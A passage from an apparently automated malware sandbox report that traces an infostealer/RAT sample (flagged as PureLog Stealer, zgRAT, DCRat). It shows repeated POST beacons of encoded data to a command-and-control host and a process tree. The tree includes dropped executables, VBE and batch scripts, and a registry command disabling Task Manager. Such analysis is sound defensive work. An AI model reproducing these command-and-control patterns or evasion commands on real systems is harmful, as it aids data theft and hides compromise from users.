                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=roKd0URBl1gG1ll3rhDl5AgiEtsc8VeYYYPw435QHBSORqu1mRnC9rxvuUg3e5DSJDChZyH801A6iLbYKpl%2B3yTe4H8VIBlifMAxdSRwYARNTqWmMqqKvdCLCC2wdzMDOKOGc2uy"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b77dcc5c34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7761&min_rtt=1499&rtt_var=13086&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=28296&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          141192.168.2.550124104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:44.850786924 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2528
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:45.207487106 CET2528OUTData Raw: 55 50 5e 52 59 5d 56 52 5e 5f 57 54 56 5e 59 59 57 56 58 53 50 5d 56 50 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UP^RY]VR^_WTV^YYWVXSP]VP[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ _+; $ !)=6,B *.));:0"<2#_>#!7]9#_&'P-+
                                                                                                          Jan 8, 2025 17:14:45.332664967 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:45.504025936 CET812INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:45 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7dJrSD9A9JTM%2FXcgUesgqXqbCTVMJ8wmJfoCRDG7NAvkPS7T%2BPyC%2FFO%2BJ49hg6v%2Bt5yLrohrMw0Skg1hYDl4y%2F9WgdFcjlElIStc8t4qt20JyJtBBAsNyuOIzw%2FJAXZeLETWVwmP"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b7d0f5a729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4156&min_rtt=2012&rtt_var=5042&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2877&delivery_rate=76180&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          142192.168.2.550125104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:45.647558928 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:46.004379988 CET2532OUTData Raw: 55 5d 5e 5e 59 59 56 5a 5e 5f 57 54 56 5a 59 5b 57 55 58 53 50 5e 56 58 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U]^^YYVZ^_WTVZY[WUXSP^VX[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#<;3Y'0.*.:;4>=!\>;:3("+$(,$Y"<-/#_&'P-7
                                                                                                          Jan 8, 2025 17:14:46.088675976 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:46.259602070 CET805INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:46 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b2eBkGf7vGuKBYTweaaSo1pymc6cpzJEWgO5Fo6ZSwy5%2BA3SsJKy32Px5Lwkntred0cpWPw7qKdVPUSPvEZWyXatr2PyRMh%2FTsObb6yxnikay0SP5GWlBBdwpjmevgnEK%2BNoGqE2"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b81cc0c0f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2492&min_rtt=1592&rtt_var=2397&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=166003&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          143192.168.2.550126104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:46.383224010 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          144192.168.2.550127104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:46.538193941 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1828
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:46.894947052 CET1828OUTData Raw: 55 53 5b 52 5c 5d 56 58 5e 5f 57 54 56 57 59 5b 57 52 58 5f 50 58 56 5c 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: US[R\]VX^_WTVWY[WRX_PXV\[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ _?+#_$3=-Y,'/X)>!)&']:W? =45?-#_&'P-
                                                                                                          Jan 8, 2025 17:14:46.902865887 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:47.122488976 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:47.179752111 CET954INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:47 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2F9FqAdK%2Fzo6%2Bcsn6HsG000MROOYOlrv5MA11fDnU0SULWIg66T%2BvTxc%2BoHU%2BFcHOhhVovB9I9o4q68Gb7ROL2LSbkbDLH4aPzYaHZ2ZLe9A1XdmUtxWlGWTrsfOI0A0WhM6wWBa"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b86dcc5424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4687&min_rtt=1572&rtt_var=6819&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2177&delivery_rate=55108&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 27 0e 30 3d 2b 00 34 05 08 09 2a 39 3c 07 3d 55 21 02 2c 29 20 5a 25 0a 2f 06 32 2c 2c 5a 22 2c 25 1c 28 06 36 00 30 18 37 09 2b 01 20 5c 04 1f 24 14 28 3b 3d 10 3d 01 36 5c 33 23 25 58 32 33 2c 58 27 3d 27 5b 27 5f 3e 54 34 07 33 55 2e 23 26 56 2e 16 28 11 2b 09 09 05 27 3e 2f 50 0f 10 38 55 2c 29 0d 5a 35 31 2d 0c 36 33 1e 03 23 36 2c 5e 2a 2e 24 0a 23 2c 31 18 33 0a 25 50 23 1c 27 55 25 33 3f 19 28 31 2c 53 28 19 24 55 2c 02 2c 49 02 3f 58 52 0d 0a
                                                                                                          Data Ascii: 98'0=+4*9<=U!,) Z%/2,,Z",%(607+ \$(;==6\3#%X23,X'='['_>T43U.#&V.(+'>/P8U,)Z51-63#6,^*.$#,13%P#'U%3?(1,S($U,,I?XR
                                                                                                          Jan 8, 2025 17:14:47.268209934 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          145192.168.2.550128104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:46.666691065 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:47.154825926 CET25INHTTP/1.1 100 Continue


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:11:12:02
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Users\user\Desktop\wxl1r0lntg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Users\user\Desktop\wxl1r0lntg.exe"
                                                                                                          Imagebase:0xb10000
                                                                                                          File size:11'304'960 bytes
                                                                                                          MD5 hash:55672946FFC3FA0B0C7670BF37D45225
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2052298255.00000000145C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:2
                                                                                                          Start time:11:12:03
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Users\user\AppData\Local\Temp\sqls211.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\sqls211.exe"
                                                                                                          Imagebase:0xcc0000
                                                                                                          File size:2'347'946 bytes
                                                                                                          MD5 hash:A79959F25EDA4401D0F5E7B370D6C613
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000003.2041272436.00000000064C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000003.2043048725.0000000004D43000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\sqls211.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\sqls211.exe, Author: Joe Security
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 68%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:3
                                                                                                          Start time:11:12:03
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Users\user\AppData\Local\Temp\drivEn760.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\drivEn760.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1'885'848 bytes
                                                                                                          MD5 hash:5036E609163E98F3AC06D5E82B677DF8
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:4
                                                                                                          Start time:11:12:04
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\2zt0n56bOhbwB2KzszETxYw2RuinHOyyQibCEaRYFawepzaxIU2GKt.vbe"
                                                                                                          Imagebase:0x130000
                                                                                                          File size:147'456 bytes
                                                                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:6
                                                                                                          Start time:11:12:21
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exe" -install "C:\Program Files\Everything" -install-options " -app-data -install-run-on-system-startup -install-service -disable-run-as-admin -uninstall-folder-context-menu -install-start-menu-shortcuts -install-desktop-shortcut -uninstall-url-protocol -install-efu-association -install-language 1033 -save-install-options 0"
                                                                                                          Imagebase:0x7ff63d470000
                                                                                                          File size:2'265'096 bytes
                                                                                                          MD5 hash:0170601E27117E9639851A969240B959
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:7
                                                                                                          Start time:11:12:22
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Program Files\Everything\Everything.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Everything\Everything.exe" -app-data -install-run-on-system-startup -install-service -disable-run-as-admin -uninstall-folder-context-menu -install-start-menu-shortcuts -install-desktop-shortcut -uninstall-url-protocol -install-efu-association -install-language 1033 -save-install-options 0
                                                                                                          Imagebase:0x7ff728bb0000
                                                                                                          File size:2'265'096 bytes
                                                                                                          MD5 hash:0170601E27117E9639851A969240B959
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Avira
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:8
                                                                                                          Start time:11:12:22
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Program Files\Everything\Everything.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Everything\Everything.exe" -svc
                                                                                                          Imagebase:0x7ff728bb0000
                                                                                                          File size:2'265'096 bytes
                                                                                                          MD5 hash:0170601E27117E9639851A969240B959
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Target ID:10
                                                                                                          Start time:11:12:24
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Program Files\Everything\Everything.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Everything\Everything.exe" -disable-update-notification -uninstall-quick-launch-shortcut -no-choose-volumes -language 1033
                                                                                                          Imagebase:0x7ff728bb0000
                                                                                                          File size:2'265'096 bytes
                                                                                                          MD5 hash:0170601E27117E9639851A969240B959
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:11
                                                                                                          Start time:11:12:25
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\2PE3PxTrTQg.bat" "
                                                                                                          Imagebase:0x790000
                                                                                                          File size:236'544 bytes
                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:12
                                                                                                          Start time:11:12:25
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:13
                                                                                                          Start time:11:12:26
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                                          Imagebase:0xd70000
                                                                                                          File size:59'392 bytes
                                                                                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:14
                                                                                                          Start time:11:12:26
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet/containerwebruntime.exe"
                                                                                                          Imagebase:0x120000
                                                                                                          File size:2'025'984 bytes
                                                                                                          MD5 hash:77967721CE1C8B3F0EB800BD33527897
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000E.00000002.2626614280.000000001267C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000000.2267598724.0000000000122000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe, Author: Joe Security
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 83%, ReversingLabs
                                                                                                          Has exited:true

                                                                                                          Target ID:15
                                                                                                          Start time:11:12:29
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwmh3iv5\xwmh3iv5.cmdline"
                                                                                                          Imagebase:0x7ff6a9370000
                                                                                                          File size:2'759'232 bytes
                                                                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:16
                                                                                                          Start time:11:12:29
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:17
                                                                                                          Start time:11:12:29
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD56.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCCB61929627DF440F9E17C549CE99168.TMP"
                                                                                                          Imagebase:0x7ff6647f0000
                                                                                                          File size:52'744 bytes
                                                                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:18
                                                                                                          Start time:11:12:30
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dcil424w\dcil424w.cmdline"
                                                                                                          Imagebase:0x7ff6a9370000
                                                                                                          File size:2'759'232 bytes
                                                                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:19
                                                                                                          Start time:11:12:30
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:20
                                                                                                          Start time:11:12:30
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Program Files\Everything\Everything.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Everything\Everything.exe"
                                                                                                          Imagebase:0x7ff728bb0000
                                                                                                          File size:2'265'096 bytes
                                                                                                          MD5 hash:0170601E27117E9639851A969240B959
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:21
                                                                                                          Start time:11:12:30
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAFE6.tmp" "c:\Windows\System32\CSCE2A537B39618441DAC64E34137FF17.TMP"
                                                                                                          Imagebase:0x7ff6647f0000
                                                                                                          File size:52'744 bytes
                                                                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:22
                                                                                                          Start time:11:12:31
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pgfcrwpp\pgfcrwpp.cmdline"
                                                                                                          Imagebase:0x7ff6a9370000
                                                                                                          File size:2'759'232 bytes
                                                                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:23
                                                                                                          Start time:11:12:31
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:24
                                                                                                          Start time:11:12:32
                                                                                                          Start date:08/01/2025
